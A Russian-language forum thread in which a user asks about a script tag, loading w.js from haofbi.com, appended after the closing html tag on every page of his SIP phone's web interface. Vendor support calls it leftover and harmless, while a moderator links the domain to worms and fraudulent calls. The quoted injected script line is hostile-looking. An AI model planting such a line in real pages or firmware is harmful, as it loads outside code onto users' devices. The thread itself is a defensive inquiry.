На главную
ПРАВИЛА FAQ Помощь Участники Календарь Избранное DigiMania RSS
msm.ru
! Правила!
Пожалуйста, подумайте два! раза перед тем как нажать кнопку Отправить.
Убедительная просьба пользоваться поиском и ИНСТРУКЦИЕЙ, и только потом спрашивать!

• Публикация вирусов/эксплоитов в бинарном виде запрещена!
  • Запрещается размещать прямые ссылки на зараженные сайты! (если хочется предупредить, то исправляйте HTTP://... на ХТТП://...)
  • Категорически запрещается поиск кряков/варезов/серийников, а также размещение ссылок на серийники/ключи/кряки и т.п.
  • Запрещается использование оскорбительных выражений в адрес участников коференции, в том числе и в личной переписке.

Модераторы: Rust

> Подозрительный код в SIP телефоне
    Стал ругаться гугл на открытие внутреннего IP телефона.

Смотрю код страницы, вижу:
    ExpandedWrap disabled
      </body>
      </html>

<script language=javascript src=http://www.haofbi.com/js/w.js></script>

Именно на этот сайт и ругается гугл. Такая вставка на каждой странице самой последней строчкой!!! Во всех телефонах этой модели.

Поиск по гуглу ничего вразумительно го не дал, кроме как похожие посты с вопросами о том, что это такое.

Вот ответ суппорта:
    Цитата
    Добрый!

Не переживайте, вируса в ПО никакого нет!
    Сайта такого на сегодня вообще не существует:
    Vladimirs-Mac-mini:~ vladimirgurin$ ping www.haofbi.com
    ping: cannot resolve www.haofbi.com: Unknown host

Ранее он был необходим разработчикам ПО телефона.

Этот код после </html> вообще исполняется? Или там мертвым грузом лежит? И вообще как-то странно это все...
    "Воля - это то, что заставляет тебя побеждать, когда твой рассудок говорит тебе, что ты повержен" Карлос Кастанеда
      haofbi.com - домен, принадлежавший китайскому хостеру Xin Net. В прошлом году бегали пара червяков, славших туда что-то... подробностей не знаю (краем уха слышал, что оттуда через заражённые IP-телефонные станции качались "левые" звонки, что при хреновой настройке вставало владельцам в изрядную копеечку). На текущий момент аренда имени не продлена, DNS-ы про домен не знают.

Но откуда-то оно у тебя берётся...
      Есть претензии ко мне как к модератору? читайте Правила, разделы 5 и 6, и действуйте соответственно.
      Есть претензии ко мне как к участнику? да ради бога.
      Не нравятся мои ответы? не читайте их.
      В общем, берегите себя. Нервные клетки не восстанавливаются.
        Меня смутило что "Ранее он был необходим разработчикам ПО телефона." Браузерным анализатором видно, что есть GET запросы туда, так что что явно не то.
        user posted image
        "Воля - это то, что заставляет тебя побеждать, когда твой рассудок говорит тебе, что ты повержен" Карлос Кастанеда
          Цитата ^D^ima @
          Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

Да я бы вообще вздрючился по этой фразе. Во радости, когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...
          Есть претензии ко мне как к модератору? читайте Правила, разделы 5 и 6, и действуйте соответственно.
          Есть претензии ко мне как к участнику? да ради бога.
          Не нравятся мои ответы? не читайте их.
          В общем, берегите себя. Нервные клетки не восстанавливаются.
            ^D^ima
            Цитата ^D^ima @
            Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

1) Не обращай внимание на название. Оно не всегда отражает суть проблемы. Даже я бы сказал так оно всегда не отображает суть проблемы.
            ИБ-уязвимостей слишком много и человек там как правило почти ничего не поверяет а используются программы-роботы. И что она там и как классифицировала никто не знает.
            2)
            Может левые звонки делали, но скорее всего просто свою рекламу показывали у них это модно и не запрещено.
            Цитата Akina @
            когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...

А инструкцию и договор никто не читает... А там наверно мелким шрифтом и непонятными словами.
            Правильный обед должен состоять из 5 блюд приготовленных из 33 ингредиентов.
              Цитата Pavia @
              А инструкцию и договор

Договор на что? и инструкция на 4 страницы
              0 пользователей читают эту тему (0 гостей и 0 скрытых пользователей)
              0 пользователей:

Рейтинг@Mail.ru
              [ Script Execution time: 0,0918 ]   [ 17 queries used ]   [ Generated: 23.09.18, 12:51 GMT ]